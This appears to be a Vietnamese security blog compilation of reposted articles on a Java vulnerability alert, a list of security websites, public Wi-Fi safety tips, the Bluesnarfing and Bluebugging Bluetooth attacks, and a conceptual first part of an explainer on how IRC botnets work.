Lỗ hổng mới bị phát hiện trên Java – Chú ý

Một lỗ hổng trong Java vừa bị phát hiện ngày 26/8 vừa qua bởi FireEye, mọi người hãy deactive java tạm thời để tránh bị khai thác qua lỗ hổng này và chờ bản cập nhật. Lỗ hổng này cho phép trình duyệt web tải về chương trình bất kì và chạy chương trình này trên máy tính của bạn.

Hiện tại chỉ những máy tính sử dụng window bị ảnh hưởng nhưng sắp tới những máy tính sử dụng Mac và Linux cũng sẽ là nạn nhận tiếp theo.

Dbglory

Những Website tốt nhất cho nghiên cứu Security

Những website hàng đầu về Security (bảo mật) sau sẽ giúp bạn tìm tòi vô số điều mới lạ trong những vấn đề mình quan tâm cũng như những kiến thức nền tảng vố cùng bổ ích.

WindowSecurity.com – Site cung cấp các tin nóng, các articles mới nhất liên quan đến bảo mật Windows. Các chủ đề thông tin đa dạng, chuyên biệt như firewalls, viruses, intrusion detection và các chủ đề về bảo mật rất hay khác ..

Security Forums – Cổng thông tin và diễn đàn bảo mật hàng đầu hiện nay. Bao gồm các chủ đề về OS Security, Network security. Đặc biệt các hướng dẫn chi tiết về xác định các yếu điểm của hệ thống và các cách thức để xử lý các sự cố bảo mật liên quan ..

GFISecurityLabs – GFISecurityLabs thuộc GFI, nhà cung cấp các công cụ bảo mật hàng đầu hiện nay. Các chuyên gia nghiên cứu hàng đầu tại đây đã đưa ra những dịch vụ về bảo mật miễn phí như EmailSecurityTest & EventLogScan và nhiều các chỉ dẫn, và thông tin mới nhất về bảo mật.

Computerworld’s Security Knowledge Center – Các vấn đề quan tâm nhất của các IT professionals đều xuất hiện tại website này. Đặc biệt các hướng dẫn thiết lập các hệ thống bảo mật cho các tổ chức lớn, các hướng dẫn về phân tích bảo mật cho các tổ chức vừa và nhỏ…

Firewall.cx – Nhiều thông tin từ basic đến advanced về Network, Protocols (IP, DNS, FTP, ICMP v.v..), giao thức định tuyến- Routing protocols, Ethernet, Routers, Firewalls, DMZ, Security, Subnetting, Supernetting, special sections, networking software, documents và các dự án triển khai mẩu, cho phép download.

Wilders.org – Không giới hạn về các chủ đề bảo mật. Các hướng dẫn (free) tools và services, và vô số những gì thú vị nhất về bảo mật mà bạn có thể tìm thấy tại đây …

McAfee Security – Virus Information Library – Thông tin cập nhật chi tiết về viruses, những hình thức tấn công mới nhất, những đe dọa phổ biến nhất và làm thế nào để đối phó với tất cả những vấn đế này…

Dutch Security Information Network – Website của cộng đồng các chuyên gia bảo mật và Network của Đức. Bao gốm nhiếu thông tin “sốt” nhất về bảo mật, các documents (free download), tools, và nhiều thông tin hay khác …

eBCVG.com – Cổng thông tin và diễn đàn sôi động về bảo mật. OS Security và network security là những chủ đề chính…

AuditMyPC – Kiểm tra miễn phí các hệ thống Firewall UDP và TCP cho tổ chức của bạn.

GovernmentSecurity.org – Được xem là website bảo mật hàng đầu hiện nay với lượng thông tin đồ sộ và có chất lượng về tất cả các lĩnh vực liên quan đến security và hacking.

(Theo Quantrimang)


Đấu giá trực tuyến hàng đầu Việt Nam

Bảo đảm an toàn khi sử dụng Wi-Fi công cộng

Các kết nối không dây thường không có chế độ bảo mật, máy tính của bạn dễ trở thành “mục tiêu” của những kẻ phá hoại. Vì vậy, bạn cần thực hiện một vài thao tác để đảm bảo an toàn cho máy tính trước khi “vi vu” trên mạng…
Kết nối không dây (Wi-Fi) đang dần phổ biến vì những tiện lợi của nó; bạn sẽ thấy sự hiện diện của chúng khắp nơi từ café Internet, trong trường học cho đến sân bay, khách sạn… Với thiết bị di động tích hợp card mạng không dây (máy tính xách tay, điện thoại di động, PDA, pocket PC…), bạn dễ dàng truy cập Internet với vài thao tác đơn giản.

Tuy nhiên để đảm bảo an toàn, bạn nên thực hiện vài thao tác đơn giản dưới đây.

Tắt tài khoản Guest. Để máy tính an toàn hơn, bạn nên tắt tài khoản Guest tránh người dùng đăng nhập bằng tài khoản này. Trong Windows XP, chọn Start\ Settings\ Control Panel\ User Accounts\ Guest\ Turn off the guest account.

Sử dụng tường lửa. Tường lửa kiểm soát dữ liệu ra vào máy tính và cảnh báo những hành vi đáng ngờ; là công cụ bảo vệ máy tính chống lại sự xâm nhập máy tính bất hợp pháp khi kết nối với môi trường bên ngoài.

Một số người dùng thường tắt tường lửa của Windows để tránh “phiền phức”. Tuy nhiên khi kết nối mạng công cộng, bạn nên kích hoạt lại tính năng này.

Thực hiện như sau: chọn Start\ Control Panel\ Windows Firewall\ tab General, đánh dấu tùy chọn mục On (recommend).

Đặt mật khẩu khi chia sẻ tập tin, thư mục. Người dùng sẽ được yêu cầu đăng nhập khi muốn truy cập những tập tin, thư mục chia sẻ. Nếu sử dụng Vista, HĐH sẽ điều chỉnh các thiết lập bảo mật dựa trên loại kết nối mạng của bạn. Chẳng hạn khi xác định dùng mạng công cộng, Vista tự động tắt chế độ chia sẻ tập tin và máy in để bảo vệ dữ liệu.

Thiết lập kết nối. Trước khi truy cập, bạn cần kiểm tra trạng thái hoạt động của card mạng, kích hoạt nó nếu đang ở chế độ disable.

Chọn card mạng không dây

Thị trường thiết bị mạng không dây khá sôi động với nhiều chuẩn khác nhau như 802.11a, 802.11b, 802.11g và những công nghệ mới như MIMO, Pre-N. Trong đó, chuẩn 802.11g (tốc độ 54, 108, 125 hay 300Mbps… tùy theo hãng và công nghệ tăng tốc) được người dùng ưa thích do chi phí hợp lý, kết nối ổn định và có thể sử dụng với hầu hết các điểm truy cập Wi-Fi công cộng.

Ngoài thương hiệu sản phẩm, bạn nên chọn mua các sản phẩm được chứng nhận bởi Hiệp Hội Wi-Fi (WFC) và tính tiện dụng của nó, chẳng hạn PC card chỉ dùng được với MTXT còn USB adaper có thể dùng cho cả máy tính để bàn.

Chọn Start\ Connect To\ Show all connections. Cửa sổ Network Connections sẽ liệt kê các dạng kết nối mạng của máy, nhấn phải chuột trên Wireless Network Connection và chọn Enable.

Để tiện cho việc quản lý kết nối, nhấn phải chuột trên Wireless Network Connection, chọn Properties. Đánh dấu tùy chọn vào mục “Show icon in notification area when connected”, nhấn OK. Biểu tượng Wireless Network Connection sẽ xuất hiện ở khay hệ thống.

Một số lưu ý: Một số loại laptop cho phép tắt/mở card mạng trực tiếp bằng hoặc thông qua phím tắt, bạn nên kiểm tra hay đọc tài liệu hướng dẫn của laptop để có thông tin này.

Nếu không có nhu cầu kết nối mạng, bạn nên tắt card mạng để đảm bảo an toàn và tiết kiệm điện năng. Thực hiện các thao tác như trên và chọn Disable.

Kế tiếp, chúng ta sẽ xác định các trạm phát sóng để kết nối bằng tiện ích của card mạng hoặc Wireless Network Connection của Windows.

Tiện ích của card mạng thường được tích hợp trong quá trình cài đặt trình điều khiển card mạng; nếu không, bạn có thể cài bổ sung. Khởi chạy tiện ích card mạng, chọn Scan để quét các kết nối mạng hiện hữu. Dựa vào một số thông tin hiển thị như tên mạng, chế độ mã hóa, độ nhạy của tín hiệu, số kênh, tần số hoạt động, bạn chỉ việc chọn mạng cần kết nối và Active (hình 3). Máy tính sẽ được cấp IP tự động, bạn nhận được thông báo cho biết đã kết nối thành công.

Nếu thường xuyên kết nối với mạng này, bạn nên lưu lại thông số cấu hình mạng (profile) để không phải thực hiện thao tác dò tìm cho các lần kết nối sau.

Wireless Network Connection của Windows không có khả năng phát hiện chuẩn của trạm phát sóng. Nếu không thể kết nối, bạn hãy hỏi thông tin từ người quản trị để biết chuẩn đang sử dụng.

Để kết nối, nhấn chuột phải trên biểu tượng Wireless Network Connection trong khay hệ thống, chọn View Available Wireless Networks. Các kết nối mạng sẽ xuất hiện với các thông tin như tên mạng, chế độ mã hóa (nếu có). Nếu không tìm thấy, nhấn Refresh Network List trong mục Network Tasks. Chọn kết nối thích hợp và Connect. Biểu tượng Wireless Network Connection ở khay hệ thống sẽ cho biết kết nối thành công hay không.

Trong thực tế, card mạng Wi-Fi thường chỉ tìm được trạm phát sóng có cùng chuẩn. Trường hợp sóng yếu, kết nối chập chờn hoặc không kết nối được… bạn có thể thử một trong những cách sau:

Di chuyển máy tính gần trạm phát sóng hơn, chọn tên mạng có cột sóng cao nhất (nhìn trên mục Signal Strength). Tín hiệu sóng càng mạnh cho tốc độ càng cao và ổn định.

Hướng điểm thu sóng (PC card) hay anten (anten USB nếu có) về phía trạm phát sóng.

Đổi chuẩn card mạng Wi-Fi sao cho tương thích.

(Theo Dantri điện tử)


Đấu giá trực tuyến hàng đầu Việt Nam

Bluetooth – mồi ngon cho hacker

Các lỗi nghiêm trọng trong công nghệ Bluetooth sử dụng ở ĐTDĐ có thể cho phép kẻ tấn công download từ xa mọi thông tin trong điện thoại hoặc giành quyền kiểm soát thiết bị. Hầu hết các kiểu tấn công đều không để lại dấu vết.

Hacker có thể thông qua Bluetooth download các địa chỉ trong danh bạ của nạn nhân, đọc lịch làm việc hoặc xem tin nhắn trong điện thoại. Thậm chí chúng có thể đặt các tin nhắn bằng lời trong bộ nhớ, hoặc biến chiếc ĐTDĐ nằm trong túi nạn nhân hoặc trên một bàn ăn nhà hàng thành thiết bị nghe lén để thu lấy những cuộc đàm thoại riêng tư trong phạm vi thu âm của nó.

Các kiểu tấn công này được hai chuyên gia Adam Laurie và Martin Herfurt trình diễn tại hội nghị về hacker và bảo mật “Black Hat and DefCon” tại Las Vegas (Mỹ), tuần trước. Các công ty điện thoại nhận xét, nguy cơ của những kiểu tấn công đó không lớn, vì thời gian nạn nhân bị sơ hở là rất ngắn và hacker phải ở gần mới thực hiện được. Tuy nhiên, các thử nghiệm – một sử dụng máy tính xách tay thông thường, và một dùng loại “súng trường” Bluetooth có khả năng thu nhận dữ liệu từ ĐTDĐ cách nó 1,8 km – chứng minh rằng phòng xa ngay từ bây giờ không phải là quá sớm.

Laurie, Giám đốc bộ phận bảo mật của công ty an ninh mạng ALD (Anh), phát hiện các hỗ hổng của Bluetooth vào tháng 11 năm ngoái. Sử dụng chương trình tự viết có tên gọi Bluesnarf, Laurie thay đổi được các thiết lập trên một laptop có tính năng Bluetooth tiêu chuẩn để tiến hành những cuộc tấn công ăn cắp dữ liệu. Tiếp đó, nhà nghiên cứu Đức Herfurt phát triển phần mềm Bluebug có khả năng biến một số loại ĐTDĐ thành một thiết bị nghe lén, truyền các cuộc đối thoại trong phạm vi sóng của thiết bị về điện thoại của kẻ tấn công.

Sử dụng Bluebug từ máy tính xách tay, kẻ tấn công có thể ra lệnh cho ĐTDĐ mục tiêu gọi về điện thoại của hắn. Đây là một cuộc gọi câm, và khi được kết nối sẽ mở ra một kênh cho hacker nghe lén những cuộc đối thoại quanh đó. Kẻ tấn công cũng có thể cài đặt một cổng trên điện thoại của nạn nhân để chuyển các cuộc gọi qua số máy của mình. Bằng cách đó, hắn theo dõi được các cuộc thoại mà nạn nhân không hề hay biết. Ngụy tạo bằng chứng giả cũng là việc rất dễ dàng vì có thể gửi tin nhắn từ máy tính thông qua ĐTDĐ của nạn nhân tới một thuê bao khác mà không để lại dấu vết.

Các cuộc tấn công thử nghiệm, với tên gọi “Bluesnarfing” và “Bluebugging”, đạt hiệu quả trên nhiều model máy của những thương hiệu nổi tiếng nhất như Ericsson, Sony Ericsson và Nokia. Trong mỗi trường hợp, các nhà nghiên cứu chỉ mất vài giây để truy cập vào điện thoại mục tiêu. Laurie và Herfurt phát hiện vài loại máy Motorola cũng có sơ hở, nhưng điện thoại Siemens thì hoàn toàn vô sự.

Các nhà sản xuất ĐTDĐ cho rằng, vì tầm hoạt động của Bluetooth là khoảng 9 mét, kẻ tấn công chỉ có thể nhằm tới những người ở trong phạm vi đó trong thời gian đủ dài. Tuy nhiên, trong thí nghiệm của mình, Laurie đã thực hiện các cuộc xâm nhập từ phạm vi 15 mét. Ông có thể đứng tại tiền sảnh hoặc hành lang của một tòa nhà và thu nhận dữ liệu từ các ĐTDĐ ở cả tầng trên và tầng dưới. Ngoài ra, một thiết bị được trình diễn tại DefCon còn có thể nâng tầng tấn công lên tới hơn 10 lần.

“Khẩu súng trường” BlueSniper, do John Hering và các đồng sự chế tạo có gắn ống ngắm và ăngten, nối với laptop Bluetooth hoặc PDA đặt trong ba lô. Từ trong một chiếc taxi đậu bên lề đường “ngắm bắn” vào cửa sổ tầng 11 của khách sạn Aladin phía bên kia đường, Hering thu được danh bạ của hơn 300 thiết bị Bluetooth. Tiếp đó, họ tự phá vỡ kỷ lục bằng cách tấn công một chiếc Nokia 6310i từ cự ly 1,8 km và sao chép danh bạ cùng các tin nhắn.

Để chống nguy cơ bị tấn công, người dùng chỉ cần tắt Bluetooth và thoát khỏi chế độ Visible sau khi trao đổi thông tin với người khác. Tuy nhiên, hầu hết mọi người đều quên thao tác này. Trong các thử nghiệm, có từ 50 đến 70% số máy bị sơ hở. Laurie đã chạy thử chương trình xâm nhập Bluetooth trên laptop tại một ga tàu điện ngầm ở London vào giờ cao điểm và phát hiện được tới 336 điện thoại Bluetooth, trong đó có 77 máy phơi mình ra trước những cuộc tấn công.

Sau đó, Laurie lại tiến hành thí nghiệm tương tự ngay trong toà nhà Quốc hội của Anh. Mặc dù laptop của Laurie đã qua kiểm tra tia X tại bàn an ninh song khi vào đến bên trong hội trường, ông phát hiện được 4 máy sơ hở trong tổng số 46 thiết bị Bluetooth của các nghị sĩ chỉ trong vòng 14 phút.

ĐTDĐ sử dụng công nghệ Bluetooth đang trở nên phổ biến. Vào năm 2008, sẽ có tới trên 50% số máy xuất xưởng trên toàn thế giới được trang bị Bluetooth. Tỷ lệ này tại Mỹ sẽ là 68%.

Nhiều người cho rằng dữ liệu lưu trên ĐTDĐ không mấy quan trọng nhưng thực ra, thiết bị này ngày càng trở nên giống với một kho dữ liệu di động để lưu giữ những mật khẩu, mã số thẻ tín dụng cùng nhiều thông tin nhạy cảm khác. Vì vậy, nguy cơ bị hack điện thoại là không thể xem thường.

Theo VNEx


Đấu giá trực tuyến hàng đầu Việt Nam

Botnet hoạt động như thế nào (Phần 1)

Một trong những phương thức tấn công DDoS hiệu quả và phổ biến nhất hiện nay là hoạt động dựa trên hàng trăm máy tính bị chiếm quyền điều khiển (tức các zombie). Những zombie này thường bị kiểm soát và quản lý qua các mạng IRC, sử dụng được gọi là các botnet. Ở bài này chúng ta sẽ xem xét một số cách thức tin tặc có thể dùng để tấn công và chiếm quyền điều khiển máy tính đích, cùng một số biện pháp đối phó hiệu quả nhằm bảo vệ máy tính trước những mối đe doạ nguy hiểm luôn rình rập xung quanh.

Chúng ta sẽ tìm hiểu về:

• Như thế nào là bot, botnet; cách thức hoạt động của chúng.
• Những thành phần phổ biến nhất trong bot.
• Một host có thể bị tấn công và chiếm quyền điều khiển như thế nào.
• Biện pháp ngăn chặn hiệu quả và cách đối phó trước hoạt động phá hoại của chúng.

Điều gì bạn nên biết?

• Cách thức hoạt động của phần mềm độc hại (malware) như trojan, worm, ….
• Cơ chế được dùng trong kiểu tấn công DDoS.
• Hiểu các khái niệm cơ bản của TCP/IP, DNS và IRC.

Các cuộc chiến robot – Botnet hoạt động như thế nào”, là tên một cuốn sách viết về thế giới hacker (nguyên bản tiếng Anh: Robot Wars – How Botnets Work, tác giả Massimiliano Romano, Simone Rosignoli, Ennio Giannini).

Cuối thế kỷ 19 cũng như đầu thiên niên kỷ mới đánh dấu bước phát triển nhanh, mạnh của một số chiến lược tấn công khác biệt nhắm vào hệ thống mạng. DDoS, tức Distributed Denial of Services, hình thức tấn công từ chối dịch vụ phân tán khét tiếng ra đời. Tương tự với người anh em DoS (tấn công từ chối dịch vụ), DDoS được phát tán rất rộng, chủ yếu nhờ tính đơn giản nhưng rất khó bị dò tìm của chúng. Đã có nhiều kinh nghiệm đối phó được chia sẻ, với khối lượng kiến thức không nhỏ về nó, nhưng ngày nay DDoS vẫn đang là một mối đe doạ nghiêm trọng, một công cụ nguy hiểm của hacker. Chúng ta hãy cùng tìm hiểu về DDoS và sản phẩm kế thừa từ nó: các cuộc tấn công botnet.

Giới thiệu về Bot và Botnet

Bot là viết tắt của robot, tức các chương trình tự động hoá (chứ không phải là người máy như nghĩa chúng ta vẫn gọi) thường xuyên được sử dụng trong thế giới Internet. Người ta định nghĩa spider được dùng bởi các công cụ tìm kiếm trực tuyến, ánh xạ website và phần mềm đáp ứng theo yêu cầu trên IRC (như eggdrop) là robot. Các chương trình tự động phản ứng khi gặp sự kiện ngoài mạng nội bộ cũng được gọi là robot. Trong bài này, chúng ta sẽ quan tâm tới một kiểu robot cụ thể (hay bot như tên tắt vẫn thường được gọi) là IRC bot. IRC bot sử dụng các mạng IRC như một kênh liên lạc để nhận lệnh từ người dùng từ xa. Ví dụ cụ thể như, người dùng là một kẻ tấn công, còn bot là một Trojan horse. Một lập trình viên giỏi có thể dễ dàng tạo ra một số bot riêng của mình, hoặc xây dựng lại từ các bot có sẵn. Chúng có thể dễ dàng ẩn nấp trước những hệ thống bảo mật cơ bản, sau đó là phát tán đi nhanh chóng trong thời gian ngắn.

IRC

IRC là tên viết tắt của Internet Relay Chat. Đó là một giao thức được thiết kế cho hoạt động liên lạc theo kiểu hình thức tán gẫu thời gian thực (ví dụ RFC 1459, các bản update RFC 2810, 2811, 2812, 2813) dựa trên kiến trúc client-server. Hầu hết mọi server IRC đều cho phép truy cập miễn phí, không kể đối tượng sử dụng. IRC là một giao thức mạng mở dựa trên nền tảng TCP (Transmission Control Protocol – Giao thức điều khiển truyền vận), đôi khi được nâng cao với SSL (Secure Sockets Layer – Tầng socket bảo mật).

Một server IRC kết nối với server IRC khác trong cùng một mạng. Người dùng IRC có thể liên lạc với cả hai theo hình thức công cộng (trên các kênh) hoặc riêng tư (một đối một). Có hai mức truy cập cơ bản vào kênh IRC: mức người dùng (user) và mức điều hành (operator). Người dùng nào tạo một kênh liên lạc riêng sẽ trở thành người điều hành. Một điều hành viên có nhiều đặc quyền hơn (tuỳ thuộc vào từng kiểu chế độ do người điều hành ban đầu thiết lập ) so với người dùng thông thường.

Các bot IRC được coi như một người dùng (hoặc điều hành viên) thông thường. Chúng là các quy trình daemon, có thể chạy tự động một số thao tác. Quá trình điều khiển các bot này thông thường dựa trên việc gửi lệnh để thiết lập kênh liên lạc do hacker thực hiện, với mục đích chính là phá hoại. Tất nhiên, việc quản trị bot cũng đòi hỏi cơ chế thẩm định và cấp phép. Vì thế, chỉ có chủ sở hữu chúng mới có thể sử dụng.

Một thành phần quan trọng của các bot này là những sự kiện mà chúng có thể dùng để phát tán nhanh chóng tới máy tính khác. Xây dựng kế hoạch cần thận cho chương trình tấn công sẽ giúp thu được kết quả tốt hơn với thời gian ngắn hơn (như xâm phạm được nhiều máy tính hơn chẳng hạn). Một số n bot kết nối vào một kênh đơn để chờ lệnh từ kẻ tấn công thì được gọi là một botnet.

Cách đây chưa lâu, các mạng zombie (một tên khác của máy tính bị tấn công theo kiểu bot) thường được điều khiển qua công cụ độc quyền, do chính những kẻ chuyên bẻ khoá cố tình phát triển. Trải qua thời gian, chúng hướng tới phương thức điều khiển từ xa. IRC được xem là công cụ phát động các cuộc tấn công tốt nhất nhờ tính linh hoạt, dễ sử dụng và đặc biệt là các server chung có thể được dùng như một phương tiện liên lạc. IRC cung cấp cách thức điều khiển đơn giản hàng trăm, thậm chí hàng nghìn bot cùng lúc một cách linh hoạt. Nó cũng cho phép kẻ tấn công che đậy nhân dạng thật của mình với một số thủ thuật đơn giản như sử dụng proxy nặc danh hay giả mạo địa chỉ IP. Song cũng chính bởi vậy mà chúng để lại dấu vết cho người quản trị server lần theo.

Trong hầu hết các trường hợp tấn công bởi bot, nạn nhân chủ yếu là người dùng máy tính đơn lẻ, server ở các trường đại học hoặc mạng doanh nghiệp nhỏ. Lý do là bởi máy tính ở những nơi này không được giám sát chặt chẽ và thường để hở hoàn toàn lớp bảo vệ mạng. Những đối tượng người dùng này thường không xây dựng cho mình chính sách bảo mật, hoặc nếu có thì không hoàn chỉnh, chỉ cục bộ ở một số phần. Hầu hết người dùng máy tính cá nhân kết nối đường truyền ADSL đều không nhận thức được các mối nguy hiểm xung quanh và không sử dụng phần mềm bảo vệ như các công cụ diệt virus hay tường lửa cá nhân.

Bot và các ứng dụng của chúng

Khả năng sử dụng bot và các ứng dụng của chúng cho máy tính bị chiếm quyền điều khiển hoàn toàn phụ thuộc vào sức sáng tạo và kỹ năng của kẻ tấn công. Chúng ta hãy xem một số ứng dụng phổ biến nhất.

DDoS

Các botnet được sử dụng thường xuyên trong các cuộc tấn công Distributed Denial of Service (DDoS). Một kẻ tấn công có thể điều khiển số lượng lớn máy tính bị chiểm quyền điều khiển tại một trạm từ xa, khai thác băng thông của chúng và gửi yêu cầu kết nối tới máy đích. Nhiều mạng trở nên hết sức tồi tệ sau khi hứng chịu các cuộc tấn công kiểu này. Và trong một số trường hợp, thủ phạm được tìm thấy ngay khi đang tiến hành cuộc phá hoại (như ở các cuộc chiến dotcom).

Tấn công từ chối dịch vụ phân tán (DDoS)

Tấn công DDoS là một biến thể của Foolding DoS (Tấn công từ chối dịch vụ tràn). Mục đích của hình thức này là gây tràn mạng đích, sử dụng tất cả băng thông có thể. Kẻ tấn công sau đó sẽ có toàn bộ lượng băng thông khổng lồ trên mạng để làm tràn website đích. Đó là cách phát động tấn công tốt nhất để đặt được nhiều máy tính dưới quyền kiểm soát. Mỗi máy tính sẽ đưa ra băng thông riêng (ví dụ với người dùng PC cá nhân nối ADSL). Tất cả sẽ được dùng một lần, và nhờ đó, phân tán được cuộc tấn công vào website đích. Một trong các kiểu tấn công phổ biến nhất được thực hiện thông qua sử dụng giao thức TCP (một giao thức hướng kết nối), gọi là TCP syn flooding (tràn đồng bộ TCP). Cách thức hoạt động của chúng là gửi đồng thời cùng lúc một số lượng khổng lồ yêu cầu kết nối TCP tới một Web Server (hoặc bất kỳ dịch vụ nào khác), gây tràn tài nguyên server, dẫn đến tràn băng thông và ngăn không cho người dùng khác mở kết nối riêng của họ. Quả là đơn giản nhưng thực sự nguy hiểm! Kết quả thu được cũng tương tự khi dùng giao thức UDP (một giao thức không kết nối).

Giới tin tặc cũng bỏ ra khá nhiều thời gian và công sức đầu tư nhằm nâng cao cách thức tấn công của chúng. Hiện nay, người dùng mạng máy tính như chúng ta đang phải đối mặt với nhiều kỹ thuật tinh vi hơn xa so kiểu tấn công DDoS truyền thống. Những kỹ thuật này cho phép kẻ tấn công điều khiển một số lượng cực kỳ lớn máy tính bị chiếm quyền điều khiển (zombie) tại một trạm từ xa mà đơn giản chỉ cần dùng giao thức IRC.

Spamming (phát tán thư rác)

Botnet là một công cụ lý tưởng cho các spammer (kẻ phát tán thư rác). Chúng đã, đang và sẽ được dùng vừa để trao đổi địa chỉ e-mail thu thập được, vừa để điều khiển cơ chế phát tán thư rác theo cùng một cách với kiểu tấn công DDoS. Thư rác được gửi tới botnet, sau đó phân phối qua các bot và từ đó phát tán tới máy tính đang bị chiếm quyền điều khiển. Tất cả spammer đều lấy tên nặc danh và mọi hậu quả thì máy tính bị phá hoại gánh chịu.

Sniffing và Keylogging

Các bot cũng có thể được sử dụng một cách hiệu quả để nâng cao nghệ thuật cổ điển của hoạt động sniffing. Nếu theo dõi lưu lượng dữ liệu truyền đi, bạn có thể xác định được con số khó tin lượng thông tin được truyền tải. Đó có thể là thói quen của người dùng, trọng tải gói TCP và một số thông tin thú vị khác (như mật khẩu, tên người dùng). Cũng tương tự như vậy với keylogging, một hình thức thu thập tất cả thông tin trên bàn phím khi người dùng gõ vào máy tính (như e-mail, password, dữ liệu ngân hàng, tài khoản PayPal,…).

Ăn cắp nhân dạng

Các phương thức được đề cập ở trên cho phép kẻ tấn công điều khiển botnet để thu thập một lượng thông tin cá nhân khổng lồ. Những dữ liệu có thể được dùng để xây dựng nhân dạng giả mạo, sau đó lợi dụng để có thể truy cập tài khoản cá nhân hoặc thực hiện nhiều hoạt động khác (có thể là chuẩn bị cho nhiều cuộc tấn công khác) mà người gánh chịu hậu quả không ai khác chính là chủ nhân của các thông tin đó.

Sở hữu phần mềm bất hợp pháp

Đây là hình thức cuối cùng, nhưng chưa phải là kết thúc. Các máy tính bị tấn công theo kiểu bot có thể được dùng như một kho lưu trữ động tài liệu bất hợp pháp (phần mềm ăn cắp bản quyền, tranh ảnh khiêu dâm,…). Dữ liệu được lưu trữ trên ổ cứng trong khi người dùng ADSL không hề hay biết.

Còn rất nhiều, rất nhiều kiểu ứng dụng khác nữa được phát triển dựa trên botnet (như trả tiền cho mỗi lần kích chuột để sử dụng một chương trình, phishing, hijacking kết nối HTTP/HTTPS…), nhưng liệt kê ra được hết có lẽ sẽ phải mất hàng giờ. Bản thân bot chỉ là một công cụ với khả năng lắp ghép và thích ứng dễ dàng cho mọi hoạt động đòi hỏi đặt quyền kiểm soát đơn lên một số lượng lớn máy tính.

Các kiểu bot khác nhau

Nhiều kiểu bot đã được xây dựng và cho phép download được cung cấp nhan nhản khắp Internet. Mỗi kiểu có những thành phần đặc biệt riêng. Chúng ta sẽ xem xét một số bot phổ biến nhất và thảo những thành phần chính và các yếu tố phân biệt của chúng.

GT-Bot

Tất cả các bot GT (Global Threat) đều dựa trên kiểu client IRC phổ biến dành cho Windows gọi là mIRC. Cốt lõi của các bot này là xây dựng tập hợp script (kịch bản) mIRC, được dùng để điểu khiển hoạt động của hệ thống từ xa. Kiểu bot này khởi chạy một phiên client nâng cao với các script điều khiển và dùng một ứng dụng thứ hai, thông thường là HideWindows để ẩn mIRC trước người dùng máy tính đích. Một file DLL bổ sung sẽ thêm một số thành phần mới vào mIRC để các script có thể chi phối nhiều khía cạnh khác nhau trên máy tính bị chiếm quyền điều khiển.

Agobot

Agobot là một trong những kiểu bot phổ biến nhất thường được các tay bẻ khoá (craker) chuyên nghiệp sử dụng. Chúng được viết trên nền ngôn ngữ C++ và phát hành dưới dạng bản quyền GPL. Điểm thú vị ở Agobot là mã nguồn. Được modul hoá ở mức cao, Agobot cho phép thêm chức năng mới vào dễ dàng. Nó cũng cung cấp nhiều cơ chế ẩn mình trên máy tính người dùng. Thành phần chính của Agobot gồm: NTFS Alternate Data Stream (Xếp luân phiên dòng dữ liệu NTFS), Antivirus Killer (bộ diệt chương trình chống virus) và Polymorphic Encryptor Engine (cơ chế mã hoá hình dạng). Agobot cung cấp tính năng sắp xếp và sniff lưu lượng. Các giao thức khác ngoài IRC cũng có thể được dùng để điều khiển kiểu bot này.

DSNX

Dataspy Network X (DSNX) cũng được viết trên nền ngồn ngữ C++ và mã nguồn dựa trên bản quyền GPL. Ở kiểu bot này có thêm một tính năng mới là kiến trúc plug-in đơn giản.

SDBot

SDBot được viết trên nền ngôn ngữ C và cũng sử dụng bản quyền GPL. Không giống như Agobot, mã nguồn của kiểu bot này rất rõ ràng và bản thân phần mềm có một lượng giới hạn chức năng. Nhưng SDBot rất phổ biến và đã được phát triển ra nhiều dạng biến thể khác nhau.

Các yếu tố của một cuộc tấn công

Hình 1 thể hiện cấu trúc của một botnet điển hình:


Hình 1
: Cấu trúc của một botnet điển hình

• Đầu tiên kẻ tấn công sẽ phát tán trojan horse vào nhiều máy tính khác nhau. Các máy tính này trở thành zombie (máy tính bị chiếm quyền điều khiển) và kết nối tới IRC server để nghe thêm nhiều lệnh sắp tới.

• Server IRC có thể là một máy công cộng ở một trong các mạng IRC, nhưng cũng có thể là máy chuyên dụng do kẻ tấn công cài đặt lên một trong các máy bị chiếm quyền điều khiển.

• Các bot chạy trên máy tính bị chiếm quyền điều khiển, hình thành một botnet.

Một ví dụ cụ thể

Hoạt động của kẻ tấn công có thể chia thành bốn giai đoạn khác nhau:

  • Tạo
  • Cấu hình
  • Tấn công
  • Điều khiển

Giai đoạn Tạo phụ thuộc lớn vào kỹ năng và đòi hỏi của kẻ tấn công. Nếu là người bẻ khoá chuyên nghiệp, họ có thể cân nhắc giữa việc viết mã bot riêng hoặc đơn giản chỉ là mở rộng, tuỳ biến cái đã có. Lượng bot có sẵn là rất lớn và khả năng cấu hình cao. Một số còn cho phép thao tác dễ dàng hơn qua một giao diện đồ hoạ. Giai đoạn này không có gì khó khăn, thường dành cho những kẻ mới vào nghề.

Giai đoạn Cấu hình là cung cấp server IRC và kênh thông tin. Sau khi cài đặt lên một máy tính đã được kiểm soát, bot sẽ kết nối tới host được chọn. Đầu tiên kẻ tấn công nhập dữ liệu cần thiết vào để giới hạn quyền truy cập bot, bảo vệ an toàn cho kênh và cuối cùng cung cấp một danh sách người dùng được cấp phép (những người có thể điều khiển bot). Ở giai đoạn này, bot có thể được điều chỉnh sâu hơn, như định nghĩa phương thức tấn công và đích đến.

Giai đoạn Tấn công là sử dụng nhiều kỹ thuật khác nhau để phát tán bot, cả trực tiếp và gián tiếp. Hình thức trực tiếp có thể là khai thác lỗ hổng của hệ điều hành hoặc dịch vụ. Còn gián tiếp thường là triển khai một số phần mềm khác phục vụ cho công việc đen tối, như sử dụng file HTML dị dạng để khai thác lỗ hổng Internet Explorer, sử dụng một số phần mềm độc hại khác phân phối qua các mạng ngang hàng hoặc qua trao đổi file DCC (Direct Client–to–Client) trên IRC. Tấn công trực tiếp thường được thực hiện tự động thông qua các sâu (worm). Tất cả công việc những sâu này phải làm là tìm kiếm mạng con trong hệ thống có lỗ hổng và chèn mã bot vào. Mỗi hệ thống bị xâm phạm sau đó sẽ tiếp tục thực hiện chương trình tấn công, cho phép kẻ tấn công ghi lại tài nguyên đã dùng trước đó và có được nhiều thời gian để tìm kiếm nạn nhân khác.

